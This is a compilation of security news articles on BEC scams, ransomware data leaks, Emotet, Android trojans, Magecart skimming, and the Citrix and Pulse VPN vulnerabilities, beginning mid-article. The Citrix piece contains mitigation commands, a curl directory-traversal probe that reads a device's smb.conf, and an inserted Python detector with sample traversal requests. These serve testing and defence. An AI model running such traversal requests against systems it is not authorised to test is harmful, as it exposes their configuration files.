In the next stage of their attack, Ancient Tortoise actors sent details on the bank account they controlled for the outstanding payments to be delivered.

Attacker-controlled account details (Agari)
When requested, Ancient Tortoise also sent the fake customers overdue payment invoices altered to show the attackers' bank account details. This only happened after the actors quickly sent an email to the fake vendor's employee posing as the CFO to have all outstanding invoices delivered "as soon as possible."

The BEC scammers delivered the fake invoice within roughly 45 minutes of the initial request, showing both resourcefulness and speed when it came to making sure that their victims don't catch on to their scam.

"An analysis of the fake invoice also showed that the scammer’s computer was set to a +4 GMT timezone," Agari also found. "This information lines up nicely with additional intelligence collected during our engagements that indicates the Ancient Tortoise actor was likely located in Dubai, United Arab Emirates."

This is just one of the BEC scammer groups Agari is tracking, with others such as Silent Starling, Curious Orca, and Scattered Canary previously being observed running elaborate BEC schemes that led to the compromise of hundreds of employees from hundreds of companies from all over the world.

"In one case, Silent Starling received a consolidated aging report that included details for more than 3,500 customers with past due payments totaling more than $6.5 million," Agari adds.

Original invoice on the left, Ancient Tortoise-altered invoice on the right (Agari)
When it comes to defense against such attacks, Agari says that "for vendors and suppliers, where the initial malicious email usually impersonates a company executive, a multi-layered approach to email security is essential, which includes implementing strong anti-phishing email and email authentication protections that specialize in defending against advanced identity deception attacks and brand spoofing.

For companies that work with external suppliers, in addition to utilizing identity deception defenses—for aging reports, attackers impersonate vendors rather than executives—having a formal process for handling outgoing payments (especially if supplier’s normal payment account has changed) is one of the best ways to prevent these types of attacks."

BEC scammers everywhere
According to the FBI's Internet Crime Complaint Center (IC3) Internet Crime Report published in April 2019, BEC scams were the cybercrime with the highest reported total losses in 2018, with BEC victims losing over $1.2 billion.

The Financial Crimes Enforcement Network (FinCEN) also released a report in July saying that BEC SAR filings (short for suspicious activity reports) grew from a monthly average of $110 million in 2016 to over $301 million per month in 2018.

The IC3 also issued a PSA in September saying that BEC scams continue to grow every year, with a 100% rise in identified global exposed losses between May 2018 and July 2019. Between June 2016 and July 2019, the IC3 received victim complaints related to 166,349 incidents with a total exposed dollar loss of more than $26 billion.

While hard to believe, these figures are somewhat backed by incidents such as the one in which Nikkei, one of the largest media organizations in the world, reported a BEC scam that cost the group roughly $29 million in October.

One month earlier, a member of the Toyota Group also announced that it was scammed in a BEC attack, with an expected financial loss of over $37 million.


Nemty Ransomware to Start Leaking Non-Paying Victim's Data
20.1.2020 
Bleepingcomputer  Ransomware

The Nemty Ransomware has outlined plans to create a blog that will be used to publish stolen data for ransomware victims who refuse to pay the ransom.

A new tactic started by the Maze Ransomware and now used by Sodinokibi is to steal files from companies before encrypting them. If a victim does not pay the ransom, then the stolen data will be leaked little-by-little until payment has been made or it has all been released.

The theory behind this is that companies may be more apt to pay a ransom if it costs less than the possible fines, data breach notification costs, loss of trade and business secrets, tarnishing of brand image, and potential lawsuits for the disclosing of personal data.

To facilitate this publishing of stolen data, the Maze operators have created a web site that they use to publish information about their non-paying victims and links to the leaked data.

Nemty plans on creating a leaked data site
In the Nemty Ransomware affiliate panel, the ransomware developers have a news feed where they post their plans, bug fixes, and upcoming changes coming to their ransomware-as-a-service.

According to a recent 'News' post shared with BleepingComputer, Nemty plans to create a web site where they will leak stolen data if ransoms are not paid.

Newsfeed from Nemty Ransomware affiliate panel
Nemty is already configured for network attacks with a builder mode that is used to create executables that target an entire network rather than individual computers.

In this mode, the created ransomware executables are "only for corporations". This means there will be one key used to decrypt all the devices in the network and victims will not be able to decrypt individual machines.

Nemty Targeted attack ransomware builder
With this functionality already in place, evolving the RaaS to incorporate data exfiltration and further extortion tactics would not be a laborious change.

It remains to be seen whether this new extortion method is paying off for the ransomware actors, but one thing is for sure: we will continue to see more threat actors adopting this tactic.

Even worse, this also means that these types of attacks are not only affecting the company but are causing personal and third-party information to be disclosed to unauthorized users.

While that means victims should treat these attacks as data breaches, existing cases suggest that they are not doing so.


Emotet Malware Restarts Spam Attacks After Holiday Break
20.1.2020 
Bleepingcomputer  Spam  Virus

After almost a three-week holiday vacation, the Emotet trojan is back and targeting over eighty countries with malicious spam campaigns.

When Emotet sends spam campaigns, the threat actors utilize various email templates that pretend to be invoices, reports, voice mails, holiday party invites, or even invites to a Greta Thunberg climate change demonstration.

These emails include malicious attachments that, when opened, will install the Emotet trojan.

Once installed, Emotet will use the victim's computer to send further spam and will also download other infections such as TrickBot, which may ultimately lead to a Ryuk Ransomware infection depending on the target.

Emotet expert Joseph Roosen told BleepingComputer that on December 21st, 2019, Emotet stopped sending spam campaigns even though their command and control servers continued to run and issue updates.

At around 8:30 AM EST today, Roosen told us that Emotet began spewing forth spam campaigns again that target recipients around the world, with a strong focus on the United States.

Emotet is back from the holidays
Current Emotet campaigns being seen today include regular emails and reply-chain attacks pretending to be proof-of-delivery documents, reports, agreements, and statements.

Email security firm Cofense told BleepingComputer that they have seen spam campaigns targeting 82 countries, with a heavy targeting against the United States.

Examples of Emotet spam shared by Cofense with BleepingComputer pretend to be various reports being sent to the victim for their review as shown below. These emails will either include attached documents or links that can be used to download them.

Reply-chain Emotet Spam
Security researcher James also saw the renewal of Emotet's campaigns in the form of proof of delivery documents being sent from alleged account departments.

Proof of delivery spam
For all of the seen campaigns, when a user opens the attachment they will be presented with a message stating that this "document only available for desktop or laptop versions of Microsoft Office Word." It then prompts the user to click on 'Enable editing' or 'Enable Content' to view the document.

Malicious Word doc
When a user enables content, malicious macros will be executed that download the Emotet trojan from a remote server and execute it.

Emotet will now quietly run in the background while using the infected device to send out further malicious spam. Eventually, Emotet will also install other payloads such as Trickbot, which will then be used to compromise the entire network and the devices on it.

As always, never open attachments from anyone without confirming over the phone that they did indeed send you the file. You should also always be cautious of enabling content or macros on any attachment you receive.

To be safe, it is advised that you also upload suspicious attachments to VirusTotal to check for malicious macros before opening them.


Android Trojan Steals Your Money to Fund International SMS Attacks
20.1.2020 
Bleepingcomputer  Android

An Android banking Trojan dubbed Faketoken has recently been observed by security researchers while draining its victims' accounts to fuel offensive mass text campaigns targeting mobile devices from all over the world.

Faketoken is an Android malware strain first introduced in an F-Secure report from 2012 as a Mobile Transaction Authentication Number (mTAN) interceptor camouflaged as a mobile token generator, a Trojan that later added ransomware capabilities in December 2016.

Besides using fake logins and phishing overlay screens to steal credentials and exfiltrating mTAN numbers used by banks to validate online transactions, the malware can also generate customized phishing pages targeting over 2,200 financial apps, and can steal device information such as the IMEI and IMSI numbers, the phone number, and more.

This Trojan is also capable of mimicking apps used for taxi ride-hailing and for paying traffic tickets, with the end goal of collecting payment card data, as Kaspersky Lab discovered in August 2017.

Faketoken phishing screens (Kaspersky)
Banking malware turned offensive mass texting tool
"Not long ago, our botnet activity monitoring system — Botnet Attack Tracking — detected that some 5,000 smartphones infected by Faketoken had started sending offensive text messages," says Alexander Eremin, malware analyst at Kaspersky Lab. "That seemed weird."

While the vast majority of mobile malware comes with SMS capability out of the box and uses it for various purposes, including intercepting text messages and spreading to other devices, banking malware using it to send mass texts is quite unusual.

Once it manages to infect a target's device, Faketoken will check if their bank accounts have enough money and it will use the stolen payment cards to add credit to the victim's mobile account.

After making sure that the funds are ready to be exhausted, Faketoken will proceed to send offensive text messages to local and international phone numbers to infect devices from all over the world on your dime.

"Faketoken’s messaging activities are charged to the infected device owners," Eremin adds. "Before sending anything out, it confirms that the victim's bank account has sufficient funds.

If the account has the cash, then the malware uses the card to top up the mobile account before proceeding with messaging."

This tactic allows it to siphon the victims' bank accounts and, given that Kaspersky Lab's researchers were able to detect roughly 5,000 smartphones infected with this Faketoken variant, the attackers can quickly add to their cash pile as more devices get infected.

Besides draining your bank account to fund its mass attacks against mobile devices from all over the world, Faketoken can also perform a wide array of other actions as instructed by the attackers:

• Change masks to intercept incoming text messages;
• Send text messages to a specified number with a specified text;
• Send text messages with a specified text to a specified list of recipients;
• Send a specified text message to all contacts;
• Upload all text messages from the device to the malicious server;
• Upload all the contacts from the device to the malicious server;
• Upload the list of installed applications to the malicious server;
• Reset the device to factory settings;
• Make a call to a specified number;
• Download a file to the device following a specified link;
• Remove specified applications;
• Create a notification on the phone to open a specified page or run a specified application;
• Start overlaying specified applications with a specified phishing window;
• Open a specified link in its own window;
• Run an application;
• Block the device in order to extort money for unblocking it. This command may include an option indicating the need to encrypt files.
Faketoken defense measures
To defend against Faketoken's recent attacks, Kaspersky Lab recommends only installing apps distributed through Google's official Play Store and blocking installs from unknown sources by going into Settings -> Security and unchecking 'Unknown sources'.

Android users are also advised to always pay attention to the access permissions requested by apps during their installation, since even apps downloaded from the Google Play Store can come with malware.

And, more importantly in the case of this particular Faketoken variant, according to Kaspersky Lab you should "not follow links from messages unless you are sure they are safe — even messages from people you know.

For example, if someone who normally posts photos on social media or sends them through instant messaging apps instead sends you a text message with a link, that’s a red flag."


Windows 7 Reminder: Get a Free Windows 10 Upgrade While You Can
20.1.2020 
Bleepingcomputer  OS

With the Windows 7 end of life fast approaching, users need to decide whether they want to upgrade to Windows 10 or just get a new PC.

Starting next Tuesday, January 14th, 2020, Windows 7 will reach its end of life, which means Microsoft will release the last cumulative update for all editions of the operating system.

This means no more security updates going forward, unless you purchase Extended Security Updates, and your computer will become vulnerable to any security vulnerabilities that are discovered in the future.

To remind people of the end of support, on January 15th, Microsoft will start displaying alerts in Windows 7 reminding them that the operating system is no longer supported and that they should upgrade to Windows 10.

Windows 7 End of Support Ad
The good news is that if you wish to upgrade to Windows 10, you can still do so for free using the steps in the following section.

Microsoft was supposed to remove this offer a long time ago, but it is still live.

It is not known, though, how long this method will keep working, so if you wish to upgrade a device from Windows 7 to Windows 10 for free, you should do so as soon as possible.

How to upgrade to Windows 10 for free
You can grab a free copy of Windows 10 by running the Media Creation Tool on your Windows 7/8.1 PC. After performing the upgrade, you have to connect to the internet and your Windows 7 license will be converted to a digital entitlement of Windows 10.

1. Go to Microsoft's Windows 10 download page from here.
2. Click the 'Download Tool now' button and the Media Creation Tool will download.
3. Open the Media Creation Tool and agree to the license.
4. Select the 'Upgrade this PC now' option and click Next.
5. Select 'Keep all apps and files' and continue. Click on the Install button to begin the installation process of Windows.
6. During the installation, the computer will restart numerous times. This process can take a while, so please be patient.
7. After Windows 10 is finished installing and you're connected, you can verify your Windows 10 activation from Settings > Windows Update > Activation.

We don't know when Microsoft will close this free upgrade method, but you should hurry up if you don't want to lose your free copy of Windows 10.


Sodinokibi Ransomware Publishes Stolen Data for the First Time
12.1.2020 
Bleepingcomputer  Ransomware

For the first time, the operators behind the Sodinokibi Ransomware have released files stolen from one of their victims because a ransom was not paid in time.

Since last month, representatives of Sodinokibi, otherwise known as REvil, have publicly stated that they would begin to follow Maze's example and publish data stolen from victims if they do not pay a ransom.

REvil post

While there have been threats made against Travelex and CDH Investments, they have not carried through with them.

This all changed today when the public representative of Sodinokibi stated they were beginning to "keep promises" as they posted links to approximately 337MB of allegedly stolen victim files on a Russian hacker and malware forum.

Sodinokibi publishing victim's data
Source: Damien
They claim this data belongs to Artech Information Systems, who describe themselves as a "minority- and women-owned diversity supplier and one of the largest IT staffing companies in the U.S", and that they will release more if a ransom is not paid.

"This is a small part of what we have. If there are no movements, we will sell the remaining, more important and interesting commercial and personal data to third parties, including financial details."

At this time, Artech's site is down and it is not known whether this is due to the attack. BleepingComputer has reached out to Artech with questions related to the ransomware attack, but has not heard back.

As we have been saying over and over, ransomware attacks need to be treated with transparency and as a data breach.

By trying to hide these attacks, and the theft of employee, company, and customer data, companies are not only risking fines and lawsuits but are also putting personal data at risk.

This practice of using stolen data as leverage is not going to go away and is only going to get worse.

Expect to see more ransomware operators begin to utilize this practice as it becomes the norm in attacks.


Android Trojan Kills Google Play Protect, Spews Fake App Reviews
12.1.2020 
Bleepingcomputer  Android

An Android malware strain camouflaged as a system app is used by threat actors to disable the Google Play Protect service, generate fake reviews, install malicious apps, show ads, and more.

The heavily obfuscated malware dubbed Trojan-Dropper.AndroidOS.Shopper.a uses a system icon and the ConfigAPKs name, which closely resembles the name of a legitimate Android service responsible for app configuration the first time a device is booted.

"Trojan-Dropper.AndroidOS.Shopper.a was most widespread in Russia, where the largest share of infected users (28.46%) was recorded in October – November 2019," Kaspersky Lab researcher Igor Golovin said. "Second place went to Brazil (18.70%) and third to India (14.23%)."

Shopper.a spread
Image: Kaspersky Lab
Malicious Play Store promotion services
Once it infects a victim's Android device, the malware downloads and decrypts the payload, then goes straight to information harvesting, collecting device info such as country, network type, vendor, smartphone model, email address, IMEI, and IMSI.

All this data is then exfiltrated to the operators' servers which will send back a series of commands to be run on the infected smartphone or tablet.

The attackers will utilize the Shopper.a Trojan to boost other malicious apps' ratings on the Play Store, post fake reviews on any apps' entries, install other apps from the Play Store or third-party app stores under the cover of an "invisible" window.

All this is done by abusing the Accessibility Service, a known tactic used by Android malware to perform a wide range of malicious activities without needing user interaction [1, 2, 3, 4]. If it has no permissions to access the service, the Trojan will use phishing to get them from the compromised device's owner.

The malware also disables the Google Play Protect mobile threat protection service, Google's built-in Android malware protection, so that it can go about its business undisturbed.

"Google Play Protect scans over 50 billion apps every day across more than two billion devices," according to the Android Security & Privacy 2018 Year In Review report published in March 2019.

Shopper.a receiving commands (Kaspersky Lab)
"The lack of installation rights from third-party sources is no obstacle to the Trojan — it gives itself the requisite permissions through Accessibility Service," Kaspersky Lab researcher Igor Golovin explained.

"With permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps. For instance, it can intercept data displayed on the screen, click buttons, and emulate user gestures."

Depending on what commands it receives from its masters, Shopper.a can perform one or more of the following tasks:

• Open links received from the remote server in an invisible window (whereby the malware verifies that the user is connected to a mobile network).
• After a certain number of screen unlocks, hide itself from the apps menu.
• Check the availability of Accessibility Service rights and, if not granted, periodically issue a phishing request to the user to provide them.
• Disable Google Play Protect.
• Create shortcuts to advertised sites in the apps menu.
• Download apps from the third-party “market” Apkpure[.]com and install them.
• Open advertised apps on Google Play and “click” to install them.
• Replace shortcuts to installed apps with shortcuts to advertised sites.
• Post fake reviews supposedly from the Google Play user.
• Show ads when the screen is unlocked.
• Register users through their Google or Facebook accounts in several apps.
"Cybercriminals use Trojan-Dropper.AndroidOS.Shopper.a to boost certain app’s rating and increase the number of installations and registrations," Golovin added.

"All this can be used, among other things, to dupe advertisers. What’s more, the Trojan can display advertising messages on the infected device, create shortcuts to ad sites, and perform other actions."

In related news, Google disclosed that Play Protect detected and removed around 1,700 applications infected with the Joker Android malware (also known as Bread) from the Play Store since the company started tracking this strain in early 2017.

To put things into perspective, while the Android Security & Privacy 2018 yearly review did not provide the exact number of removed malicious apps, the 2017 one states that the company "took down more than 700,000 apps that violated the Google Play policies, 70% more than the apps taken down in 2016."


Citrix ADC CVE-2019-19781 Exploits Released, Fix Now!
12.1.2020 
Bleepingcomputer  Exploit

Numerous working exploits for the Citrix ADC (NetScaler) CVE-2019-19781 vulnerability are finally here and have been publicly posted in numerous locations. There is no patch available for this vulnerability, but Citrix has provided mitigations, which should be applied now!

If successfully exploited, this vulnerability allows unauthenticated users to utilize directory traversal to perform arbitrary code execution.

Since late December, we have been reporting and security professionals have been warning that an exploit for this vulnerability is imminent and that administrators must apply mitigations to their devices as soon as possible.

Two days after reporting that attackers were attempting to exploit, or at least scan for, vulnerable devices, numerous exploits have been made public that allow attackers to take control of vulnerable Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) devices.

The public proof-of-concept (PoC) exploits that have been released allow attackers to easily create reverse shells back to their machines and execute commands on the vulnerable devices. This essentially allows an attacker to gain full control over these devices.

Security company MDSec published a technical deep dive for this vulnerability and provided a demonstration of how a working PoC can be used to create a reverse shell back to an attacker.

BleepingComputer will not be providing links to any of these exploits as we have too many readers who may use it for malicious reasons.

Mitigate your Citrix ADC devices now!
Even though Citrix disclosed this vulnerability almost a month ago, there is still no patch available for the Citrix ADC CVE-2019-19781 vulnerability.

Instead, Citrix has released a series of steps administrators can use to mitigate the problem.

These steps are different depending on how the system was installed, but you can use the following steps for a standalone system:

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config
Users are also advised to sign up for security alerts from Citrix to be notified when patches become available.

In the meantime, all administrators should apply the mitigation steps and also configure IDS systems to monitor for this threat.

According to TrustedSec, you can test whether the mitigations have been applied properly with the following command (replace host with the IP/hostname of your server):

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
If you receive a 403 response, it means you properly applied the mitigations. If you can see the contents of smb.conf, the mitigations were not applied correctly and the device is still vulnerable.

TrustedSec has also provided a guide that can be used to check your devices for evidence of a compromise.

"With the recent Citrix ADC (NetScaler) CVE-2019-19781 Remote Code Execution vulnerability, the TrustedSec Incident Response team has been working closely with our offensive and research teams as they created a working exploit. This has allowed us to create a list of locations and indicators to search for on potentially compromised Citrix ADC hosts."

It is recommended that all Citrix ADC administrators become familiar with TrustedSec's forensics guide and monitor their devices for attacks.

Finally, Nextron Systems' Florian Roth has provided Sigma detection rules for SIEM systems that can be used to detect attempts to exploit the CVE-2019-19781 vulnerability against Citrix ADC (NetScaler) and Citrix Gateway devices.
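The following Python is added here as an example and is not code from Citrix, TrustedSec, Nextron Systems or the article. It applies the same predicate as the Citrix responder policy above (a decoded URL containing "/vpns/" requested by a non-SSLVPN client, or containing "/../") to constructed access-log lines, so it both flags exploitation attempts and shows whether the 403 the mitigation should produce is actually being returned; the log format and sample lines are made up for this example.

```python
"""Detect CVE-2019-19781 traversal attempts and verify the mitigation is live.

Added example (not from the article, Citrix or TrustedSec). The predicate is
the one encoded in responder policy ctx267027; the access-log format below is
a constructed one: <client_ip> <sslvpn:yes|no> <status> "<method> <path>".
"""
import re
from typing import Iterable, List, Tuple
from urllib.parse import unquote

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) (?P<sslvpn>yes|no) (?P<status>\d{3}) "(?P<method>[A-Z]+) (?P<path>\S+)"$'
)


def is_traversal_request(path: str, client_is_sslvpn: bool) -> bool:
    """Same decision as the Citrix policy: URL-decode, then require "/vpns/"
    and either an unauthenticated (non-SSLVPN) client or a "/../" component.
    Percent-decoding stands in for DECODE_USING_TEXT_MODE (an assumption)."""
    decoded = unquote(path)
    if "/vpns/" not in decoded:
        return False
    return (not client_is_sslvpn) or ("/../" in decoded)


def analyze(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, path, verdict) per parsed line.

    "blocked"           : traversal request answered with the policy's 403
    "ALERT unmitigated" : traversal request answered with anything else,
                          i.e. the responder policy is missing or not bound
    "benign"            : request the policy would not touch
    """
    results = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # unparsable line; a real pipeline would count these
        flagged = is_traversal_request(m["path"], m["sslvpn"] == "yes")
        if not flagged:
            verdict = "benign"
        elif m["status"] == "403":
            verdict = "blocked"
        else:
            verdict = "ALERT unmitigated"
        results.append((m["ip"], m["path"], verdict))
    return results


# Constructed sample log: the TrustedSec check before and after the fix,
# ordinary traffic, an authenticated VPN user, and a percent-encoded variant.
SAMPLE_LOG = [
    '203.0.113.5 no 200 "GET /vpn/../vpns/cfg/smb.conf"',
    '203.0.113.5 no 403 "GET /vpn/../vpns/cfg/smb.conf"',
    '198.51.100.7 no 200 "GET /vpn/index.html"',
    '192.0.2.9 yes 200 "GET /vpns/cfg/smb.conf"',
    '203.0.113.5 no 200 "GET /vpn/..%2Fvpns/cfg/smb.conf"',
]

if __name__ == "__main__":
    for ip, path, verdict in analyze(SAMPLE_LOG):
        print(f"{verdict:18} {ip:14} {path}")
```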

Expected patch release dates
Citrix has contacted BleepingComputer to share a blog post containing the estimated dates that patches for the Citrix Application Delivery Controller (ADC) and Citrix Gateway CVE-2019-19781 vulnerability will become available.

The current schedule for these patches and their corresponding versions are below.

Version   Refresh Build   Expected Release Date
10.5      10.5.70.x       31st January 2020
11.1      11.1.63.x       20th January 2020
12.0      12.0.63.x       20th January 2020
12.1      12.1.55.x       27th January 2020
13.0      13.0.47.x       27th January 2020
Updated 1/11/20 11:05 PM EST: Updated article to include estimated patch dates for various versions of the affected Citrix software.


Australia Bushfire Donors Affected by Credit Card Skimming Attack
12.1.2020 
Bleepingcomputer  CyberCrime

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals the payment information of the donors.

This type of attack is called Magecart and involves hackers compromising a web site and injecting malicious JavaScript into eCommerce or checkout pages. These scripts will then steal any credit cards or payment information that is submitted and send it off to a remote site under the attacker's control.

The Malwarebytes Threat Intelligence Team has discovered a legitimate web site collecting donations for the tragic bushfires in Australia that has been compromised by a Magecart script.

While the donors were probably not targeted by this attack, they are unfortunately caught in the cross fire.

When a visitor of the site adds an item to their cart, such as a donation, a malicious credit-card skimmer script named ATMZOW will be loaded into the checkout pages.

Donation page with the ATMZOW skimmer
When a user submits their payment information as part of the checkout process, the malicious script will steal the submitted information and send it to the vamberlo[.]com domain. This domain is obfuscated in the script as shown below.

Obfuscated domain that payment information is sent to
Malwarebytes' Jérôme Segura has told BleepingComputer that once they became aware of the compromised site they were able to get the vamberlo[.]com domain shut down.

For now, this means that any visitors to the site will no longer have their payment information stolen.

As the code is still active on the site, though, it could be modified by the hackers to utilize a new domain that will enable the skimming script again.

Malwarebytes has contacted the site about the malicious script injected into their eCommerce store but has not heard back at this time.

Skimmer active on other sites
Using the PublicWWW tool, Troy Mursch of Bad Packets Report has also discovered that this same script is currently active on 39 other web sites.

Skimmer active on other sites
It is not known if those sites are utilizing the same domain to send payment information.

If they are, then with the shutdown of the vamberlo[.]com domain, they will no longer be active as well.


Maze Ransomware Publishes 14GB of Stolen Southwire Files
12.1.2020 
Bleepingcomputer  Ransomware

The Maze Ransomware operators have released an additional 14GB of files that they claim were stolen from one of their victims for not paying a ransomware demand.

In December the Maze Ransomware operators attacked Southwire, a wire and cable manufacturer out of Georgia, and allegedly stole 120GB worth of files before encrypting 878 devices on the network.

Maze then demanded $6 million in bitcoins or they would publicly release Southwire's stolen files.

When Southwire did not make a payment, the Maze operators uploaded some of the company's files to a "News" site that they had created to shame non-paying victims.

This led to Southwire filing a lawsuit against Maze in Georgia courts and asking for an injunction in the courts of Ireland against a web hosting provider who was hosting the Maze news site. This injunction led to the site being taken down and Southwire's stolen data no longer being accessible.

"Not in retaliation"
Yesterday, the Maze operators released an additional 14.1GB of stolen files that they claim belong to Southwire on a Russian hacking forum. They further state that they will continue to release 10% of the data every week unless the ransom is paid.

"But now our website is back but not only that. Because of southwire actions, we will now start sharing their private information with you, this only 10% of their information and we will publish the next 10% of the information each week until they agree to negotiate. Use this information in any nefarious ways that you want", the Maze operators stated in their post.

When we asked the Maze operators if they released this additional data out of retaliation for the lawsuit, BleepingComputer was told:

" Before lawsuit it was just few files as a proof. Now it is 10% of 120GB, but not in retaliation. It was planned if they don't negotiate. We will post new parts every week if they don't change their mind.
So the next week another 10%, after 2 weeks another 10% and so on while 100% (120GB) is not published. They can stop this process by negotiating with us and revert it to full data destruction after payment.
In retaliation we have something more interesting ;)
But retaliation doesn't come if they begin negotiate with us."

When we asked what they meant by "something more interesting", they would not elaborate any further.

Ultimately, no company should ever pay a ransom, as it only encourages this type of criminal behavior to continue. It is also easy to say that when you are not in Southwire's predicament.

Southwire now needs to weigh the cost of their data being exposed versus the cost of paying the ransom.

If their data contains third-party information, including personal information about employees or customers, then this attack would need to be classified also as a data breach.

This would then require additional costs for government notifications, customer and employee notifications, and potentially fines depending on any privacy laws that may have been violated.

As the data is being released in small batches, each one would constitute a separate data breach but could also potentially be reported under one breach notification.

BleepingComputer has contacted Southwire regarding the release of additional files, but have not heard back at this time.


Sodinokibi Ransomware Hits New York Airport Systems
12.1.2020 
Bleepingcomputer  Ransomware

Albany International Airport's staff announced that the New York airport's administrative servers were hit by Sodinokibi Ransomware following a cyberattack that took place over Christmas.

Airport operations were not impacted by the ransomware attack and customers' financial or personal information was not accessed by the attackers according to a statement from airport officials per WNYT-TV.

No airline or TSA servers were affected in the incident, with airport officials saying that the vast majority of encrypted files were administrative documents and archived data.

The Albany County Airport Authority alerted the FBI and the New York State Cyber Command as soon as the attack was discovered, and also hired the services of ABS Solutions to help with the investigation.

MSP's breached systems used as a stepping stone
The attackers were able to infiltrate the New York airport's systems through the maintenance server of its managed service provider (MSP) Logical Net, a Schenectady, NY-based data center services and hosted cloud solutions provider.

The Sodinokibi Ransomware malware spread through the Albany County Airport Authority's network and also reached the backup servers.

Following the attack, airport CEO Philip Calderone told Times Union that "We have severed our relationship with LogicalNet."

Left without backups, the airport paid the "under six figures" ransom the attackers demanded. Albany International Airport's insurer reimbursed part of the ransom payment, with a $25,000 deductible to be recovered from Logical Net.

"Thanks to the fast action by our IT department, airport operations during one of the busiest travel periods of the year were not impacted and no passenger or airline data was acquired or accessed," Calderone added.

"Within hours the authority was able to resume all administrative functions with systems functioning as normal. We are grateful for the assistance provided by the New York State Cyber Command, the FBI and our consultant ABS."

BleepingComputer has contacted the Albany International Airport, Logical Net, and the Sodinokibi actors asking for more details but has not yet heard back.

High-profile Sodinokibi victims
International foreign currency exchange Travelex is another company hit by Sodinokibi on New Year's Eve, with the company being forced to shut down all its systems "to protect data and prevent the spread of the virus."

Following the complete systems shutdown, customers were unable to use the site or the app for transactions at around 1,500 Travelex locations across the world.

While Travelex said in a statement that there is no evidence that any of its data was stolen in the attack, the Sodinokibi crew later told BleepingComputer that they copied over 5GB of personal and financial data, including but not limited to names, dates of birth, social security numbers, payment card info.

They also said that Travelex's backup files were also deleted and they will start publishing the stolen data if the company doesn't pay the $3 million ransom in seven days.

U.S. data center provider CyrusOne also had some of its systems encrypted by Sodinokibi Ransomware in early December 2019, while hundreds of dental practices using the online backup product DDS Safe had their files locked in August after the software's developer got infected through its cloud management provider, PercSoft.


Beware of Amazon Prime Support Scams in Google Search Ads
12.1.2020 
Bleepingcomputer  Spam

A malicious ad campaign is underway in Google Search results that leads users to fake Amazon support sites and tech support scams.

A security researcher reached out to BleepingComputer today about search keywords such as "amazon prime" and "amazon prime customer support" that lead to ads pretending to be Amazon Prime support.

For example, in the image below simply searching for "amazon prime" resulted in a fake and shady-looking support ad hosted on sites.google.com.

Scam ads in Google Search results
BleepingComputer performed these searches and was able to verify that these malicious ads were being displayed.

When a user clicks on the ad they will be brought to a page that attempts to impersonate Amazon and includes a phone number to call to receive help. This number is 1-844-325-7794, which is different from the legitimate Amazon support number of 1 (888) 280-4331.

Fake Amazon Support Site
When BleepingComputer attempted to call the number, we received a busy signal each time we called.

In addition to Amazon support scams, other ads discovered by the researcher were for the search keywords "my account" and "login" that lead to a variety of different tech support scams like the one below.

Tech Support Scam ads in Google Search
Clicking on these ads leads to tech support scams located on sites such as sites.google.com, Azure, and other providers.

Tech Support Scam via Google Ads
Now many of you may look at these ads and wonder how anyone could fall for them.

The reality is that there are many people, especially older people, who are not comfortable with computers, the Internet, and receiving support via online chat and email.

These types of people are more apt to search for a support phone number and then click on a link without properly analyzing the ad for suspicious characteristics.

Users need to be very careful of the sites that they click on in search results because in many cases they are not vetted properly and can lead to malicious sites.

This is especially true during the holidays or right after them, as users are commonly looking for support numbers for presents that they have received.


US Govt Warns of Attacks on Unpatched Pulse VPN Servers
12.1.2020 
Bleepingcomputer  BigBrothers

The US Cybersecurity and Infrastructure Security Agency (CISA) today alerted organizations to patch their Pulse Secure VPN servers as a defense against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability.

This warning follows another alert issued by CISA in October 2019, and others coming from the National Security Agency (NSA), the Canadian Centre for Cyber Security, and UK's National Cyber Security Center (NCSC).

Pulse Secure reported the vulnerability tracked as CVE-2019-11510 and disclosed by Orange Tsai and Meh Chang from the DEVCORE research team, and by Jake Valletta from FireEye in an April 2019 out-of-cycle advisory.

The company also issued software updates to patch all affected Pulse Connect Secure and Pulse Policy Secure versions.

"CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes," today's DHS alert warns.

Unpatched Pulse Secure VPN servers remain an attractive target for malicious actors. @CISAgov released an Alert on continued exploitation of CVE-2019-11510 in Pulse Secure. Update ASAP! https://t.co/n7mx9juifv #Cyber #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) January 10, 2020
If left unpatched, CVE-2019-11510 could allow remote unauthenticated attackers to compromise vulnerable VPN servers and "gain access to all active users and their plain-text credentials" and execute arbitrary commands.

On unpatched systems, the flaw "allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords)," security researcher Kevin Beaumont explains.

According to an NSA advisory from October 2019, "Exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code."

"Actors will take advantage of the vulnerability that was reported on Pulse Secure, Fortinet and Palo Alto VPN products – and in this case, exploit unpatched VPN servers to propagate malware, REvil (Sodinokibi), by distributing and activating the Ransomware through interactive prompts of the VPN interface to the users attempting to access resources through unpatched, vulnerable Pulse VPN servers," Pulse Secure Chief Marketing Officer Scott Gordon told Bleeping Computer.

Week 19 CVE-2019-11510 Scan Results
• Vulnerable Pulse Secure VPN servers detected: 3,825

Our latest vulnerability scan results are freely available for authorized CERT, CSIRT, and ISAC teams.

Submit request here: https://t.co/vlS08kyQo2#cybersecurity #infosec #threatintel

— Bad Packets Report (@bad_packets) January 4, 2020
While on August 25, 2019, cyber threat intelligence outfit Bad Packets was able to discover 14,528 unpatched Pulse Secure servers, this month a subsequent scan yielded 3,825 results showing that a vast majority of orgs patched their VPN gateways.

